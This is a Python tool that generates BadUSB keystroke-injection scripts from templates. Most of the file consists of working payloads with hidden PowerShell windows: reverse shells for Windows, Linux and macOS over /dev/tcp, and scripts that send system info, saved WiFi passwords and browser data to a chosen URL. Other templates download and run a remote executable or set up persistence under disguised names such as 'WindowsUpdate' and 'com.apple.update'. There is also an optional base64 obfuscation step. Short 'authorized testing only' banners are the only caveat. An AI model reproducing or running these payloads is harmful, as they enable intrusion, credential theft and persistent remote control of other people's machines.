#!/usr/bin/env python3
"""
BadUSB Payload Generator
Generates DuckyScript payloads from templates

For authorized security testing only.
"""

import argparse
import os
import sys
import base64
import re
from datetime import datetime

# Payload Templates
TEMPLATES = {
    "reverse_shell_windows": {
        "name": "Windows Reverse Shell",
        "description": "PowerShell reverse shell to attacker",
        "os": "windows",
        "params": ["ip", "port"],
        "template": """REM Windows Reverse Shell
REM Target: Windows 10/11
REM Author: Generated by Payload Generator

DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1500
STRING $client = New-Object System.Net.Sockets.TCPClient('{ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()
ENTER
"""
    },
    "reverse_shell_linux": {
        "name": "Linux Reverse Shell",
        "description": "Bash reverse shell to attacker",
        "os": "linux",
        "params": ["ip", "port"],
        "template": """REM Linux Reverse Shell
REM Target: Linux/Ubuntu
REM Author: Generated by Payload Generator

DELAY 1000
CTRL ALT t
DELAY 1000
STRING bash -i >& /dev/tcp/{ip}/{port} 0>&1 &
ENTER
DELAY 200
STRING exit
ENTER
"""
    },
    "reverse_shell_macos": {
        "name": "macOS Reverse Shell",
        "description": "Bash reverse shell for macOS",
        "os": "macos",
        "params": ["ip", "port"],
        "template": """REM macOS Reverse Shell
REM Target: macOS
REM Author: Generated by Payload Generator

DELAY 1000
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 1500
STRING bash -i >& /dev/tcp/{ip}/{port} 0>&1 &
ENTER
DELAY 200
GUI m
"""
    },
    "recon_windows": {
        "name": "Windows Reconnaissance",
        "description": "Collect system info and exfiltrate",
        "os": "windows",
        "params": ["exfil_url"],
        "template": """REM Windows Reconnaissance
REM Collects system info and sends to server
REM Author: Generated by Payload Generator

DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1500
STRING $info = @{{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING User = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object {{ $_.InterfaceAlias -notlike '*Loopback*' }}).IPAddress -join ','
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }}
ENTER
STRING $json = $info | ConvertTo-Json
ENTER
STRING Invoke-WebRequest -Uri '{exfil_url}' -Method POST -Body $json -ContentType 'application/json'
ENTER
STRING exit
ENTER
"""
    },
    "recon_linux": {
        "name": "Linux Reconnaissance",
        "description": "Collect system info and exfiltrate",
        "os": "linux",
        "params": ["exfil_url"],
        "template": """REM Linux Reconnaissance
REM Collects system info and sends to server
REM Author: Generated by Payload Generator

DELAY 1000
CTRL ALT t
DELAY 1000
STRING (echo "hostname=$(hostname)"; echo "user=$(whoami)"; echo "ip=$(hostname -I | awk '{{print $1}}')"; echo "os=$(cat /etc/os-release | grep PRETTY_NAME | cut -d= -f2)") | curl -X POST -d @- {exfil_url}
ENTER
DELAY 200
STRING exit
ENTER
"""
    },
    "wifi_extract_windows": {
        "name": "Windows WiFi Credential Extract",
        "description": "Extract saved WiFi passwords",
        "os": "windows",
        "params": ["exfil_url"],
        "template": """REM Windows WiFi Credential Extraction
REM Extracts saved WiFi passwords
REM Author: Generated by Payload Generator

DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1500
STRING $wifi = (netsh wlan show profiles) | Select-String 'All User Profile' | ForEach-Object {{ ($_ -replace '.*: ','') }} | ForEach-Object {{ $name=$_; (netsh wlan show profile name="$name" key=clear) | Select-String 'Key Content' | ForEach-Object {{ "$name`:$($_ -replace '.*: ','')" }} }}
ENTER
STRING Invoke-WebRequest -Uri '{exfil_url}' -Method POST -Body ($wifi -join "`n")
ENTER
STRING exit
ENTER
"""
    },
    "persistence_registry": {
        "name": "Windows Registry Persistence",
        "description": "Add persistence via Run key",
        "os": "windows",
        "params": ["payload_url"],
        "template": """REM Windows Registry Persistence
REM Adds Run key persistence
REM Author: Generated by Payload Generator

DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1500
STRING $payload = "powershell -w hidden -c `"IEX(IWR '{payload_url}')`""
ENTER
STRING Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'WindowsUpdate' -Value $payload
ENTER
STRING exit
ENTER
"""
    },
    "persistence_cron": {
        "name": "Linux Cron Persistence",
        "description": "Add cron job persistence",
        "os": "linux",
        "params": ["ip", "port"],
        "template": """REM Linux Cron Persistence
REM Adds crontab persistence
REM Author: Generated by Payload Generator

DELAY 1000
CTRL ALT t
DELAY 1000
STRING (crontab -l 2>/dev/null; echo "*/5 * * * * bash -i >& /dev/tcp/{ip}/{port} 0>&1") | crontab -
ENTER
DELAY 200
STRING exit
ENTER
"""
    },
    "persistence_launchagent": {
        "name": "macOS LaunchAgent Persistence",
        "description": "Add LaunchAgent persistence",
        "os": "macos",
        "params": ["ip", "port"],
        "template": """REM macOS LaunchAgent Persistence
REM Creates persistent LaunchAgent
REM Author: Generated by Payload Generator

DELAY 1000
GUI SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 1500
STRING mkdir -p ~/Library/LaunchAgents && cat > ~/Library/LaunchAgents/com.apple.update.plist << 'EOF'
ENTER
STRING <?xml version="1.0" encoding="UTF-8"?>
ENTER
STRING <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
ENTER
STRING <plist version="1.0"><dict><key>Label</key><string>com.apple.update</string><key>ProgramArguments</key><array><string>/bin/bash</string><string>-c</string><string>bash -i >&amp; /dev/tcp/{ip}/{port} 0>&amp;1</string></array><key>RunAtLoad</key><true/><key>KeepAlive</key><true/></dict></plist>
ENTER
STRING EOF
ENTER
DELAY 200
STRING launchctl load ~/Library/LaunchAgents/com.apple.update.plist
ENTER
STRING exit
ENTER
"""
    },
    "download_execute": {
        "name": "Download and Execute",
        "description": "Download file and execute",
        "os": "windows",
        "params": ["file_url"],
        "template": """REM Download and Execute Payload
REM Downloads file and executes
REM Author: Generated by Payload Generator

DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden -c "IWR -Uri '{file_url}' -OutFile $env:TEMP\\payload.exe; Start-Process $env:TEMP\\payload.exe"
ENTER
"""
    },
    "exfil_browser_windows": {
        "name": "Windows Browser Data Exfil",
        "description": "Extract and exfiltrate browser data",
        "os": "windows",
        "params": ["exfil_url"],
        "template": """REM Browser Data Exfiltration
REM Extracts browser bookmarks and history
REM Author: Generated by Payload Generator

DELAY 1000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1500
STRING $data = @()
ENTER
STRING if(Test-Path "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Bookmarks"){{ $data += Get-Content "$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Bookmarks" -Raw }}
ENTER
STRING if(Test-Path "$env:APPDATA\\Mozilla\\Firefox\\Profiles"){{ $data += Get-ChildItem "$env:APPDATA\\Mozilla\\Firefox\\Profiles" -Recurse -Filter "places.sqlite" | Select-Object -First 1 | Get-Content -Raw }}
ENTER
STRING $b64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($data -join "---"))
ENTER
STRING IWR -Uri '{exfil_url}' -Method POST -Body $b64
ENTER
STRING exit
ENTER
"""
    }
}

def list_templates():
    """List all available templates"""
    print("\nAvailable Payload Templates:")
    print("=" * 60)
    for key, template in TEMPLATES.items():
        print(f"\n{key}")
        print(f"  Name: {template['name']}")
        print(f"  OS: {template['os']}")
        print(f"  Description: {template['description']}")
        print(f"  Parameters: {', '.join(template['params'])}")
    print()

def generate_payload(template_name, params):
    """Generate payload from template with parameters"""
    if template_name not in TEMPLATES:
        print(f"Error: Template '{template_name}' not found")
        return None

    template = TEMPLATES[template_name]

    # Validate parameters
    for param in template['params']:
        if param not in params:
            print(f"Error: Missing parameter '{param}'")
            print(f"Required parameters: {', '.join(template['params'])}")
            return None

    # Generate payload
    payload = template['template']
    for key, value in params.items():
        payload = payload.replace('{' + key + '}', value)

    # Add header
    header = f"""REM ========================================
REM Payload: {template['name']}
REM Generated: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
REM Target OS: {template['os']}
REM ========================================
REM WARNING: For authorized testing only!
REM ========================================

"""
    return header + payload

def encode_payload(payload, method='base64'):
    """Encode payload using specified method"""
    if method == 'base64':
        # Extract STRING commands and encode them
        lines = payload.split('\n')
        encoded_lines = []
        for line in lines:
            if line.startswith('STRING '):
                content = line[7:]  # Remove 'STRING '
                encoded = base64.b64encode(content.encode()).decode()
                encoded_lines.append(f'REM Original: {content[:50]}...')
                encoded_lines.append(f'STRING {encoded}')
            else:
                encoded_lines.append(line)
        return '\n'.join(encoded_lines)
    return payload

def validate_payload(payload):
    """Basic payload validation"""
    issues = []

    lines = payload.split('\n')
    for i, line in enumerate(lines, 1):
        line = line.strip()

        # Check for common issues
        if line.startswith('STRING') and len(line) > 500:
            issues.append(f"Line {i}: STRING too long (>500 chars)")

        if 'DELAY' in line:
            match = re.search(r'DELAY\s+(\d+)', line)
            if match and int(match.group(1)) > 10000:
                issues.append(f"Line {i}: DELAY very long (>10s)")

    return issues

def save_payload(payload, filename):
    """Save payload to file"""
    with open(filename, 'w') as f:
        f.write(payload)
    print(f"Payload saved to: {filename}")

def main():
    parser = argparse.ArgumentParser(
        description='BadUSB Payload Generator - For Authorized Testing Only',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  List templates:
    python payload_generator.py --list

  Generate reverse shell:
    python payload_generator.py -t reverse_shell_windows -p ip=192.168.1.100 -p port=4444

  Generate and save:
    python payload_generator.py -t recon_windows -p exfil_url=http://10.0.0.1:8080/collect -o payload.txt

  Validate payload:
    python payload_generator.py -t reverse_shell_windows -p ip=192.168.1.100 -p port=4444 --validate
        """
    )

    parser.add_argument('-l', '--list', action='store_true',
                        help='List available templates')
    parser.add_argument('-t', '--template', type=str,
                        help='Template name to use')
    parser.add_argument('-p', '--param', action='append', default=[],
                        help='Parameter in format key=value (can be used multiple times)')
    parser.add_argument('-o', '--output', type=str,
                        help='Output file path')
    parser.add_argument('--validate', action='store_true',
                        help='Validate generated payload')
    parser.add_argument('--encode', choices=['base64', 'none'], default='none',
                        help='Encode payload strings')

    args = parser.parse_args()

    print("=" * 50)
    print("BadUSB Payload Generator")
    print("For Authorized Security Testing Only")
    print("=" * 50)

    if args.list:
        list_templates()
        return

    if not args.template:
        parser.print_help()
        return

    # Parse parameters
    params = {}
    for p in args.param:
        if '=' in p:
            key, value = p.split('=', 1)
            params[key] = value

    # Generate payload
    payload = generate_payload(args.template, params)
    if not payload:
        return

    # Encode if requested
    if args.encode != 'none':
        payload = encode_payload(payload, args.encode)

    # Validate if requested
    if args.validate:
        issues = validate_payload(payload)
        if issues:
            print("\nValidation Issues:")
            for issue in issues:
                print(f"  - {issue}")
        else:
            print("\nValidation: No issues found")

    # Output
    if args.output:
        save_payload(payload, args.output)
    else:
        print("\nGenerated Payload:")
        print("-" * 50)
        print(payload)
        print("-" * 50)

if __name__ == '__main__':
    main()
